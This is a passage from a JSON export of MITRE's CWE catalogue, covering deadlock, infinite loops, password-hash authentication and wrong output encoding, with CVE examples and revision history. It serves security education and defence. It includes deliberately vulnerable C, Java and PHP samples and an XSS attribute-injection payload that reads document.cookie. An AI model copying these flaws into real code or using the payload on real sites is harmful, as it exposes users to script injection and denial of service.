memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4210"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"},{"Reference":"CVE-2009-1243","Description":"OS kernel performs an unlock in some incorrect circumstances, leading to panic.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1243"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"833":{"attr":{"@_ID":"833","@_Name":"Deadlock","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Other)","DoS: Crash, Exit, or Restart"],"Note":"Each thread of execution will \\"hang\\" and prevent tasks from completing. In some cases, CPU consumption may occur if a lock check occurs in a tight loop."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1476","Description":"A bug in some Intel Pentium processors allow DoS (hang) via an invalid \\"CMPXCHG8B\\" instruction, causing a deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1476"},{"Reference":"CVE-2009-2857","Description":"OS deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2857"},{"Reference":"CVE-2009-1961","Description":"OS deadlock involving 3 separate functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961"},{"Reference":"CVE-2009-2699","Description":"deadlock in library","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2699"},{"Reference":"CVE-2009-4272","Description":"deadlock triggered by packets that force collisions in a routing table","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272"},{"Reference":"CVE-2002-1850","Description":"read/write deadlock between web server and script","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1850"},{"Reference":"CVE-2004-0174","Description":"web server deadlock involving multiple listening connections","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0174"},{"Reference":"CVE-2009-1388","Description":"multiple simultaneous calls to the same function trigger deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388"},{"Reference":"CVE-2006-5158","Description":"chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158"},{"Reference":"CVE-2006-4342","Description":"deadlock when an operation is performed on a resource while it is being removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4342"},{"Reference":"CVE-2006-2374","Description":"Deadlock in device driver triggered by using file handle of a related device.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2374"},{"Reference":"CVE-2006-2275","Description":"Deadlock when large number of small messages cannot be processed quickly enough.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2275"},{"Reference":"CVE-2005-3847","Description":"OS kernel has deadlock triggered by a signal during a core dump.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3847"},{"Reference":"CVE-2005-3106","Description":"Race condition leads to deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3106"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK08-J","Entry_Name":"Ensure actively held locks are released on exceptional conditions"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, "Synchronization Problems", section "Starvation and Deadlocks", Page 760"}},{"attr":{"@_External_Reference_ID":"REF-783","@_Section":"Chapter 7, "Concurrency", section "Mutual Exclusion and Deadlock", Page 248"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"834":{"attr":{"@_ID":"834","@_Name":"Excessive Iteration","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an iteration or loop without sufficiently limiting the number of times that the loop is executed.","Extended_Description":"If the iteration can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory. In many cases, a loop does not need to be infinite in order to cause enough resource consumption to adversely affect the software or its host system; it depends on the amount of resources consumed per iteration.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Amplification","DoS: Crash, Exit, or Restart"],"Note":"Excessive looping will cause unexpected consumption of resources, such as CPU cycles or memory. The software\'s operation may slow down, or cause a long time to respond. If limited resources such as memory are consumed for each iteration, the loop may eventually cause a crash or program exit due to exhaustion of resources, such as an out-of-memory error."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Forced Path Execution"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1027","Description":"Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1027"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t looping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t the loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Looping Constructs", Page 327"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"835":{"attr":{"@_ID":"835","@_Name":"Loop with Unreachable Exit Condition (\'Infinite Loop\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.","Extended_Description":"If the loop can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Amplification"],"Note":"An infinite loop will cause unexpected consumption of resources, such as CPU cycles or memory. The software\'s operation may slow down, or cause a long time to respond."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following code the method processMessagesFromServer attempts to establish a connection to a server and read and process messages from the server. The method uses a do/while loop to continue trying to establish the connection to the server when an attempt fails.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessagesFromServer(char *hostaddr, int port) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int servsock;int connected;struct sockaddr_in servaddr;servsock = socket( AF_INET, SOCK_STREAM, 0);memset( &servaddr, 0, sizeof(servaddr));servaddr.sin_family = AF_INET;servaddr.sin_port = htons(port);servaddr.sin_addr.s_addr = inet_addr(hostaddr);do {} while (connected < 0);...","xhtml:br":["","","","","","","","","","","","","","","","",""],"xhtml:i":["// create socket to connect to server","// keep trying to establish connection to the server","// close socket and return success or failure"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"connected = connect(servsock, (struct sockaddr *)&servaddr, sizeof(servaddr));if (connected > -1) {}","xhtml:br":["","","","","",""],"xhtml:i":["// establish connection to server","// if connected then read and process messages from server"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// read and process messages"}}}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int processMessagesFromServer(char *hostaddr, int port) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int count = 0;do {} while (connected < 0 && count < MAX_ATTEMPTS);...","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// initialize number of attempts counter","// keep trying to establish connection to the server","// up to a maximum number of attempts","// close socket and return success or failure"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"connected = connect(servsock, (struct sockaddr *)&servaddr, sizeof(servaddr));count++;if (connected > -1) {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// establish connection to server","// increment counter","// if connected then read and process messages from server"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// read and process messages"}}}}}}}}],"Body_Text":"However, this will create an infinite loop if the server does not respond. This infinite loop will consume system resources and can be used to create a denial of service attack. To resolve this a counter should be used to limit the number of attempts to establish a connection to the server, as in the following code."},{"Intro_Text":"For this example the method isReorderNeeded as part of a bookstore application that determines if a particular book needs to be reordered based on the current inventory count and the rate at which the book is being sold.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isReorderNeeded(String bookISBN, int rateSold) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isReorder = false;int minimumCount = 10;int days = 0;int inventoryCount = inventory.getIventoryCount(bookISBN);while (inventoryCount > minimumCount) {}if (days > 0 && days < 5) {}return isReorder;","xhtml:br":["","","","","","","","","","","","","","","","",""],"xhtml:i":["// get inventory count for book","// find number of days until inventory count reaches minimum","// if number of days within reorder timeframe","// set reorder return boolean to true"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"inventoryCount = inventoryCount - rateSold;days++;","xhtml:br":["","",""]}},{"#text":"isReorder = true;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isReorderNeeded(String bookISBN, int rateSold) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (rateSold < 1) {}...","xhtml:br":["","","","",""],"xhtml:i":"// validate rateSold variable","xhtml:div":{"#text":"return isReorder;","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":"However, the while loop will become an infinite loop if the rateSold input parameter has a value of zero since the inventoryCount will never fall below the minimumCount. In this case the input parameter should be validated to ensure that a value of zero does not cause an infinite loop,as in the following code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1027","Description":"Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1027"},{"Reference":"CVE-2011-1142","Description":"Chain: self-referential values in recursive definitions lead to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1142"},{"Reference":"CVE-2011-1002","Description":"NULL UDP packet is never cleared from a queue, leading to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t looping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t the loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"},{"Reference":"CVE-2010-4476","Description":"Floating point conversion routine cycles back and forth between two different values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4476"},{"Reference":"CVE-2010-4645","Description":"Floating point conversion routine cycles back and forth between two different values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4645"},{"Reference":"CVE-2010-2534","Description":"Chain: improperly clearing a pointer in a linked list leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2534"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"},{"Reference":"CVE-2008-3688","Description":"Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-835"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Looping Constructs", Page 327"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-835"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"836":{"attr":{"@_ID":"836","@_Name":"Use of Password Hash Instead of Password for Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software records password hashes in a data store, receives a hash of a password from a client, and compares the supplied hash to the hash obtained from the data store.","Extended_Description":{"xhtml:p":["Some authentication mechanisms rely on the client to generate the hash for a password, possibly to reduce load on the server or avoid sending the password across the network. However, when the client is used to generate the hash, an attacker can bypass the authentication by obtaining a copy of the hash, e.g. by using SQL injection to compromise a database of authentication credentials, or by exploiting an information exposure. The attacker could then use a modified client to replay the stolen hash without having knowledge of the original password.","As a result, the server-side comparison against a client-side hash does not provide any more security than the use of passwords without hashing."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"602","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could bypass the authentication routine without knowing the original password."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1283","Description":"Product performs authentication with user-supplied password hashes that can be obtained from a separate SQL injection vulnerability (CVE-2009-1282).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1283"},{"Reference":"CVE-2005-3435","Description":"Product allows attackers to bypass authentication by obtaining the password hash for another user and specifying the hash in the pwd argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"652"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"837":{"attr":{"@_ID":"837","@_Name":"Improper Enforcement of a Single, Unique Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software requires that an actor should only be able to perform an action once, or to have only one unique action, but the software does not enforce or improperly enforces this restriction.","Extended_Description":"In various applications, a user is only expected to perform a certain action once, such as voting, requesting a refund, or making a purchase. When this restriction is not enforced, sometimes this can have security implications. For example, in a voting application, an attacker could attempt to \\"stuff the ballot box\\" by voting multiple times. If these votes are counted separately, then the attacker could directly affect who wins the vote. This could have significant business impact depending on the purpose of the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"799","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Other","Note":"An attacker might be able to gain advantage over other users by performing the action multiple times, or affect the correctness of the software."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-0294","Description":"Ticket-booking web application allows a user to lock a seat more than once.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0294"},{"Reference":"CVE-2005-4051","Description":"CMS allows people to rate downloads by voting more than once.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4051"},{"Reference":"CVE-2002-216","Description":"Polling software allows people to vote more than once by setting a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-216"},{"Reference":"CVE-2003-1433","Description":"Chain: lack of validation of a challenge key in a game allows a player to register multiple times and lock other players out of the game.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1433"},{"Reference":"CVE-2002-1018","Description":"Library feature allows attackers to check out the same e-book multiple times, preventing other users from accessing copies of the e-book.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1018"},{"Reference":"CVE-2009-2346","Description":"Protocol implementation allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many message exchanges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"838":{"attr":{"@_ID":"838","@_Name":"Inappropriate Encoding for Output Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or specifies an encoding when generating output to a downstream component, but the specified encoding is not the same as the encoding that is expected by the downstream component.","Extended_Description":{"xhtml:p":["This weakness can cause the downstream component to use a decoding method that produces different data than what the software intended to send. When the wrong encoding is used - even if closely related - the downstream component could decode the data incorrectly. This can have security consequences when the provided boundaries between control and data are inadvertently broken, because the resulting data could introduce control characters or special elements that were not sent by the software. The resulting data could then be used to bypass protection mechanisms such as input validation, and enable injection attacks.","While using output encoding is essential for ensuring that communications between components are accurate, the use of the wrong encoding - even if closely related - could cause the downstream component to misinterpret the output.","For example, HTML entity encoding is used for elements in the HTML body of a web page. However, a programmer might use entity encoding when generating output for that is used within an attribute of an HTML tag, which could contain functional Javascript that is not affected by the HTML encoding.","While web applications have received the most attention for this problem, this weakness could potentially apply to any type of software that uses a communications stream that could support multiple encodings."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use context-aware encoding. That is, understand which encoding is being used by the downstream component, and ensure that this encoding is used. If an encoding can be specified, do so, instead of assuming that the default encoding is the same as the default being assumed by the downstream component."},{"Phase":"Architecture and Design","Strategy":"Output Encoding","Description":"Where possible, use communications protocols or data formats that provide strict boundaries between control and data. If this is not feasible, ensure that the protocols or formats allow the communicating components to explicitly state which encoding/decoding method is being used. Some template frameworks provide built-in support."},{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.","Note that some template mechanisms provide built-in support for the appropriate encoding."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code dynamically builds an HTML page using POST data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_POST[\'username\'];$picSource = $_POST[\'picsource\'];$picAltText = $_POST[\'picalttext\'];echo \\"<title>Welcome, \\" . htmlentities($username) .\\"</title>\\";echo \\"<img src=\'\\". htmlentities($picSource) .\\" \' alt=\'\\". htmlentities($picAltText) . \'\\" />\';","xhtml:br":["","","","","","","",""],"xhtml:i":["...","..."]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"\\"altTextHere\' onload=\'alert(document.cookie)\\""},{"attr":{"@_Nature":"result","@_Language":"HTML"},"xhtml:div":"<img src=\'pic.jpg\' alt=\'altTextHere\' onload=\'alert(document.cookie)\' />"}],"Body_Text":["The programmer attempts to avoid XSS exploits (CWE-79) by encoding the POST values so they will not be interpreted as valid HTML. However, the htmlentities() encoding is not appropriate when the data are used as HTML attributes, allowing more attributes to be injected.","For example, an attacker can set picAltText to:","This will result in the generated HTML image tag:","The attacker can inject arbitrary javascript into the tag due to this incorrect encoding."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-2814","Description":"Server does not properly handle requests that do not contain UTF-8 data; browser assumes UTF-8, allowing XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2814"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS13-J","Entry_Name":"Use compatible encodings on both sides of file or network IO"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"468"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-786"}},{"attr":{"@_External_Reference_ID":"REF-787"}},{"attr":{"@_External_Reference_ID":"REF-788"}},{"attr":{"@_External_Reference_ID":"REF-789"}},{"attr":{"@_External_Reference_ID":"REF-709","@_Section":"Preventing XSS Attacks"}},{"attr":{"@_External_Reference_ID":"REF-725"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, 